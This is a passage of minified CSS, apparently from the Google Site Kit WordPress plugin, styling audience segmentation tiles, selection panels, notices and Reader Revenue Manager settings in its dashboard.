.googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric .googlesitekit-audience-segmentation-tile-metric__badge-container .googlesitekit-change-badge{margin-top:0}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--cities .googlesitekit-audience-segmentation-tile-metric__container{min-width:0}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--cities .googlesitekit-audience-segmentation-tile-metric__content{display:grid;gap:16px;grid-auto-columns:minmax(0, 1fr);grid-auto-flow:column;margin-top:12px}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--cities .googlesitekit-audience-segmentation-tile-metric__content{gap:10px}}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--cities .googlesitekit-audience-segmentation-tile-metric__content .googlesitekit-audience-segmentation-tile-metric__cities-metric .googlesitekit-audience-segmentation-tile-metric__cities-metric-name{color:#161b18;font-size:14px;font-weight:500;line-height:1.14;margin-bottom:2px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--cities .googlesitekit-audience-segmentation-tile-metric__content .googlesitekit-audience-segmentation-tile-metric__cities-metric .googlesitekit-audience-segmentation-tile-metric__cities-metric-value{color:#161b18;font-size:14px;font-weight:400;line-height:1.43}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--top-content .googlesitekit-audience-segmentation-tile-metric__title{height:20px;line-height:20px;margin-bottom:10px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--top-content .googlesitekit-audience-segmentation-tile-metric__title:has(.googlesitekit-audience-segmentation-partial-data-badge){align-items:center;display:flex;height:auto;justify-content:space-between;margin:4px 0 14px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--top-content .googlesitekit-cta-link,.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--top-content .googlesitekit-audience-segmentation-tile__top-content-metric-name{margin-right:30px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--top-content .googlesitekit-audience-segmentation-tile-metric__container,.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--top-content .googlesitekit-cta-link{min-width:0}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--top-content .googlesitekit-audience-segmentation-tile-metric__container .googlesitekit-cta-link__contents,.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--top-content .googlesitekit-audience-segmentation-tile-metric__container .googlesitekit-audience-segmentation-tile__top-content-metric-name,.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--top-content .googlesitekit-cta-link .googlesitekit-cta-link__contents,.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--top-content .googlesitekit-cta-link .googlesitekit-audience-segmentation-tile__top-content-metric-name{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--top-content .googlesitekit-audience-segmentation-tile-metric__page-metric-container{display:flex;font-size:12px;justify-content:space-between;line-height:1.33;margin:6px 0}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--top-content .googlesitekit-audience-segmentation-tile-metric__content .googlesitekit-audience-segmentation-partial-data-notice{margin-top:10px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--top-content .googlesitekit-audience-segmentation-tile-metric__content .googlesitekit-audience-segmentation-tile-metric__no-data p{color:#161b18;font-size:12px;font-weight:400;line-height:16px;margin:0}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile-metric.googlesitekit-audience-segmentation-tile-metric--top-content .googlesitekit-audience-segmentation-tile-metric__content .googlesitekit-audience-segmentation-tile-metric__no-data .mdc-button{margin-top:8px;min-height:32px;padding:6px 16px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile.googlesitekit-audience-segmentation-tile--partial-data .googlesitekit-audience-segmentation-tile__header{padding:19px 25px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile__zero-data-container{align-items:center;display:flex;flex-direction:column;text-align:center}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile__zero-data-container .googlesitekit-audience-segmentation-tile__header{border-bottom:none}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile__zero-data-container .googlesitekit-audience-segmentation-tile__zero-data-content{padding:155px 0}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile__zero-data-container .googlesitekit-audience-segmentation-tile__zero-data-image{margin-bottom:20px;width:106px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile__zero-data-container .googlesitekit-audience-segmentation-tile__zero-data-description{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:500;line-height:1.14;margin:0}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile .googlesitekit-audience-segmentation-tile__zero-data-container .googlesitekit-audience-segmentation-tile-hide-cta{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-weight:500;margin:6px 0;padding:6px 12px;white-space:nowrap}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-loading{margin:16px 16px 20px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-loading{margin:24px 24px 28px}}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-loading .googlesitekit-preview-block{margin:22px 0}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-loading .googlesitekit-preview-block:first-of-type{display:none}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-loading .googlesitekit-preview-block:last-of-type{margin-bottom:31px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-loading .googlesitekit-preview-block{margin:24px 0}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-loading .googlesitekit-preview-block:first-of-type{display:flex;margin-bottom:35px}}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-error{background-color:#fff;border:2px solid #ac4220;border-radius:16px;padding:155px 0}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-error .googlesitekit-audience-segmentation-tile-error__container{align-items:center;display:flex;flex-direction:column;gap:24px;margin:16px auto;text-align:center}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-error .googlesitekit-audience-segmentation-tile-error__container .googlesitekit-audience-segmentation-tile-error__image{width:190px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-error .googlesitekit-audience-segmentation-tile-error__container .googlesitekit-audience-segmentation-tile-error__body .googlesitekit-audience-segmentation-tile-error__title{color:#161b18;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:500;line-height:1.14;margin-top:0}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-error .googlesitekit-audience-segmentation-tile-error__container .googlesitekit-audience-segmentation-tile-error__body .googlesitekit-audience-segmentation-tile-error__actions .googlesitekit-report-error-actions{color:#6c726e;flex-direction:column-reverse;font-size:12px;font-weight:400;line-height:1.33;margin:0 16px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-error .googlesitekit-audience-segmentation-tile-error__container .googlesitekit-audience-segmentation-tile-error__body .googlesitekit-audience-segmentation-tile-error__actions .googlesitekit-report-error-actions .mdc-button{min-height:32px;padding:6px 16px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-placeholder{min-height:542px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-placeholder .googlesitekit-widget__body{align-items:center;display:flex;justify-content:center}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-placeholder__container{align-items:center;display:flex;flex-direction:column;gap:24px;max-width:340px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-placeholder__image{max-width:245px}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-placeholder__body{text-align:center}.googlesitekit-plugin .googlesitekit-audience-segmentation-tile-placeholder__body--without-selectable-audiences{margin-top:10px}.googlesitekit-plugin .googlesitekit-typography.googlesitekit-audience-segmentation-tile-placeholder__title{color:#161b18;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:500;line-height:1.14;margin:0 0 6px}.googlesitekit-plugin p.googlesitekit-audience-segmentation-tile-placeholder__description{color:#6c726e;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;line-height:1.33;margin:0}.googlesitekit-plugin p.googlesitekit-audience-segmentation-tile-placeholder__description .googlesitekit-cta-link{font-weight:500}.googlesitekit-audience-segmentation-info-notice{align-items:center;background-color:#fff;border-radius:16px;display:flex;gap:20px;justify-content:space-between;padding:16px}@media(min-width: 960px){.googlesitekit-audience-segmentation-info-notice{padding:16px 40px}}.googlesitekit-audience-segmentation-info-notice svg{flex-shrink:0}.googlesitekit-widget--InfoNoticeWidget svg{color:#fece72}.googlesitekit-audience-segmentation-info-notice__body{align-items:center;display:flex;flex-grow:1;flex-wrap:wrap;gap:0 60px;min-width:0}.googlesitekit-audience-segmentation-info-notice__body p{flex-basis:400px;flex-grow:1}.googlesitekit-audience-segmentation-info-notice__dismiss{flex-shrink:0;margin-left:auto}.googlesitekit-plugin .googlesitekit-audience-segmentation-error-widget{border:2px solid #ac4220}.googlesitekit-plugin .googlesitekit-audience-segmentation-error-widget .googlesitekit-audience-segmentation-error__widget-primary-cell{padding:20px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-audience-segmentation-error-widget .googlesitekit-audience-segmentation-error__widget-primary-cell{padding:20px 36px}}.googlesitekit-plugin .googlesitekit-audience-segmentation-error-widget .googlesitekit-audience-segmentation-error__widget-primary-cell .googlesitekit-typography--title{display:grid;margin:0 0 14px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-audience-segmentation-error-widget .googlesitekit-audience-segmentation-error__widget-primary-cell .googlesitekit-typography--title{place-content:start}}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-audience-segmentation-error-widget .googlesitekit-audience-segmentation-error__widget-primary-cell .googlesitekit-typography--title{margin:14px 0}}.googlesitekit-plugin .googlesitekit-audience-segmentation-error-widget .googlesitekit-report-error-actions{align-items:flex-start;display:flex;flex-direction:column-reverse}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-audience-segmentation-error-widget .googlesitekit-report-error-actions{padding-bottom:10px}}.googlesitekit-plugin .googlesitekit-audience-segmentation-error-widget .googlesitekit-report-error-actions .mdc-button{padding:6px 16px}.googlesitekit-plugin .googlesitekit-audience-segmentation-error-widget .googlesitekit-report-error-actions .googlesitekit-error-retry-text{color:#161b18;flex:1;letter-spacing:.25px;margin:-14px 0 0}.googlesitekit-plugin .googlesitekit-audience-segmentation-error-widget .googlesitekit-widget-audience-segmentation-error__svg-wrapper{display:flex;justify-content:flex-start;margin:16px 8px 0}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-audience-segmentation-error-widget .googlesitekit-widget-audience-segmentation-error__svg-wrapper{justify-content:space-evenly;margin:0}}.googlesitekit-plugin .googlesitekit-audience-segmentation-error-widget .googlesitekit-widget-audience-segmentation-error__failed-audiences{list-style:disc;list-style-position:inside}.googlesitekit-plugin .googlesitekit-audience-segmentation-error-widget .googlesitekit-widget-audience-segmentation-error__failed-audiences li{margin-left:10px}.googlesitekit-info-tooltip__content.googlesitekit-info-tooltip__content--audience{color:#ebeef0}.googlesitekit-info-tooltip__content.googlesitekit-info-tooltip__content--audience a{color:#ebeef0;-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget-audience-tiles{border-radius:16px}.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget-audience-tiles .googlesitekit-widget-audience-tiles__tabs .mdc-tab-scroller{border-top-left-radius:16px;border-top-right-radius:16px}.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget-audience-tiles .googlesitekit-widget-audience-tiles__tabs .mdc-tab-scroller .mdc-tab-scroller__scroll-content .mdc-tab{pointer-events:none}.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget-audience-tiles .googlesitekit-widget-audience-tiles__tabs .mdc-tab-scroller .mdc-tab-scroller__scroll-content .mdc-tab .googlesitekit-info-tooltip{color:#108080}.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget-audience-tiles .googlesitekit-widget-audience-tiles__tabs .mdc-tab-scroller .mdc-tab-scroller__scroll-content .mdc-tab .mdc-tab__content{pointer-events:all}.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget-audience-tiles .googlesitekit-widget-audience-tiles__tabs .mdc-tab-scroller .mdc-tab-scroller__scroll-content .mdc-tab .mdc-tab__content .googlesitekit-info-tooltip{height:18px;margin-left:5px}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget-audience-tiles{background-color:transparent}}.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget-audience-tiles>.googlesitekit-widget__body .googlesitekit-widget-audience-tiles__body{display:grid;gap:16px;grid-auto-columns:1fr;grid-template-columns:1fr}.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget-audience-tiles>.googlesitekit-widget__body .googlesitekit-widget-audience-tiles__body>.googlesitekit-widget{overflow:hidden}@media(max-width: 960px){.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget-audience-tiles>.googlesitekit-widget__body .googlesitekit-widget-audience-tiles__body>:not(.googlesitekit-audience-segmentation-error-widget){border-top-left-radius:0;border-top-right-radius:0}}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-widget.googlesitekit-widget-audience-tiles>.googlesitekit-widget__body .googlesitekit-widget-audience-tiles__body{gap:24px;grid-auto-columns:minmax(400px, 1fr);grid-auto-flow:column;grid-template-columns:repeat(auto-fit, minmax(400px, 1fr));overflow-x:auto}}.googlesitekit-plugin .googlesitekit-audience-widget__source{float:right;margin:14px 0;padding:4px 0}.googlesitekit-plugin .googlesitekit-lean-cta-banner.googlesitekit-no-audience-banner .googlesitekit-lean-cta-banner__graphic{padding-bottom:26px}.googlesitekit-plugin .googlesitekit-lean-cta-banner.googlesitekit-no-audience-banner .googlesitekit-lean-cta-banner__graphic svg{max-height:110px}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-lean-cta-banner.googlesitekit-no-audience-banner .googlesitekit-lean-cta-banner__graphic{padding-bottom:20px;padding-inline:85px;padding-top:20px}}.googlesitekit-plugin .mdc-layout-grid.googlesitekit-widget-area--mainDashboardTrafficAudienceSegmentation{padding-top:3px}@media(min-width: 961px){.googlesitekit-plugin .mdc-layout-grid.googlesitekit-widget-area--mainDashboardTrafficAudienceSegmentation{padding-top:8px}}.googlesitekit-audience-segmentation-partial-data-notice{background-color:#ffe4b1;border-radius:8px;color:#4e3300;display:flex;font-size:12px;letter-spacing:.2px;line-height:1.33;padding:16px}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-selection-box .googlesitekit-badge-with-tooltip{padding:4px 10px}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__learn-more{color:#6c726e;font-size:12px;letter-spacing:.2px;line-height:1.33;margin-top:auto;padding:20px 24px}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-selection-panel-footer{margin:0}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__error-notice{align-items:anchor-center;column-gap:16px;display:flex;flex-direction:row;justify-content:space-between;padding:10px 24px}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__error-notice .googlesitekit-notice__content{width:100%}@media(max-width: 600px){.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__error-notice .googlesitekit-notice__content{width:150%}}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__error-notice .googlesitekit-notice__content p{margin:0}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__error-notice .googlesitekit-report-error-actions{align-items:end;flex-direction:column}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__add-group-notice{background-color:#f3f5f7;margin:5px 24px;padding:16px 20px}@media(max-width: 449px){.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__add-group-notice{padding:16px}}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__add-group-notice .googlesitekit-audience-segmentation-info-notice__body{flex-wrap:nowrap;grid-gap:0 30px}@media(max-width: 449px){.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__add-group-notice .googlesitekit-audience-segmentation-info-notice__body{flex-wrap:wrap}}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__add-group-notice .googlesitekit-audience-segmentation-info-notice__body p{margin:0}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__add-group-notice svg{height:22px;width:22px}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__add-group-notice .googlesitekit-audience-segmentation-info-notice__dismiss{color:#161b18}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice{background-color:#f3f5f7;border-radius:8px;margin:5px 24px;padding:20px}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice .googlesitekit-notice__content{flex:1 1 0}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice .googlesitekit-notice__description{font-size:12px}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice .googlesitekit-notice__action{justify-content:normal;width:auto}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice .googlesitekit-notice--warning{align-items:center;border-radius:8px;flex-direction:row;gap:16px;margin-top:18px;padding:8px 16px}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice .googlesitekit-notice--error{margin-top:18px}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice .googlesitekit-notice--error .googlesitekit-notice__icon{display:none}.googlesitekit-plugin .googlesitekit-audience-selection-panel p.googlesitekit-audience-selection-panel__audience-creation-notice-title{color:#6c726e;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;font-weight:500;letter-spacing:.2px;line-height:1.33;margin:0}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice-body{display:flex;flex-direction:column;justify-content:space-between}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice-audience{display:flex;justify-content:space-between;margin-bottom:12px;padding-top:5px}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice-audience+.googlesitekit-audience-selection-panel__audience-creation-notice-audience{border-top:1px solid #cbd0d3;padding-top:12px}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice-audience-details h3{color:#161b18;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:500;line-height:1.43;margin-bottom:1px;margin-top:7px}.googlesitekit-plugin .googlesitekit-audience-selection-panel p.googlesitekit-audience-selection-panel__audience-creation-notice-audience-description{color:#161b18;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;font-weight:400;letter-spacing:.2px;line-height:1.33;margin:0}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice-audience-button{align-items:center;display:flex}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice-audience-button .mdc-button{background-color:#161b18;min-height:32px;padding:6px 16px}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice-dismiss{margin-top:14px;text-align:right}.googlesitekit-plugin .googlesitekit-audience-selection-panel .googlesitekit-audience-selection-panel__audience-creation-notice-dismiss .googlesitekit-cta-link{color:#161b18;font-weight:500}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice{align-items:center;background-color:#b8e5ca;color:#265c3b;display:flex;gap:10px;justify-content:flex-start;padding:10px 24px}.googlesitekit-plugin p.googlesitekit-audience-selection-panel__success-notice-message{color:inherit;font-size:12px;letter-spacing:.2px;line-height:1.33;margin:0}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-icon{height:24px;width:24px}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions{margin-left:auto}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary{margin:0 auto;min-height:32px;padding:6px 16px;white-space:nowrap}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:not(:disabled){color:#265c3b}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:hover:not(:disabled){background-color:rgba(147,201,168,.6)}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:hover:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:hover::before,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:hover::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:hover::before,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:hover::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:hover:hover::before{opacity:.04}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:hover:not(:disabled){color:#265c3b}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:focus:not(:disabled){background-color:#93c9a8}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:active::before,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:active::after,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:focus::before,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:active::before,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:active::after,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:focus::before,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:active:hover::before,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:focus:hover::before{opacity:.04}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:active.mdc-ripple-upgraded,.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:active:not(:disabled),.googlesitekit-plugin .googlesitekit-audience-selection-panel__success-notice-actions .mdc-button--tertiary:focus:not(:disabled){color:#265c3b}.googlesitekit-plugin .googlesitekit-settings-module--reader-revenue-manager .googlesitekit-settings-module__meta-items:last-child .googlesitekit-settings-module__meta-item:last-child{margin-bottom:0}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-settings-module--reader-revenue-manager .googlesitekit-settings-module__meta-items:last-child .googlesitekit-settings-module__meta-item{margin-bottom:0}}.googlesitekit-plugin .googlesitekit-settings-module--reader-revenue-manager .googlesitekit-publication-onboarding-state-notice+.googlesitekit-settings-module__meta-items{margin-top:16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-settings-module--reader-revenue-manager .googlesitekit-publication-onboarding-state-notice+.googlesitekit-settings-module__meta-items{margin-top:24px}}.googlesitekit-plugin .googlesitekit-rrm-settings-edit .googlesitekit-settings-module__fields-group:not(:last-child) .googlesitekit-publication-onboarding-state-notice{margin-bottom:16px}.googlesitekit-plugin .googlesitekit-rrm-settings-edit .googlesitekit-settings-module__fields-group:not(:last-child) .googlesitekit-publication-onboarding-state-notice:has(+.googlesitekit-rrm-settings-edit__product-id-container){margin-bottom:32px}.googlesitekit-plugin .googlesitekit-rrm-settings-edit .googlesitekit-rrm-settings-edit__product-id-container{align-items:center;display:flex;flex-wrap:wrap;gap:16px;margin-bottom:16px;margin-top:16px;position:relative}.googlesitekit-plugin .googlesitekit-rrm-settings-edit .googlesitekit-rrm-settings-edit__product-id-container .googlesitekit-rrm-settings-edit__product-id-info-notice{width:100%}@media(min-width: 783px){.googlesitekit-plugin .googlesitekit-rrm-settings-edit .googlesitekit-rrm-settings-edit__product-id-container .googlesitekit-rrm-settings-edit__product-id-warning-notice{left:220px;max-width:442px;position:absolute;top:-10px}}.googlesitekit-plugin 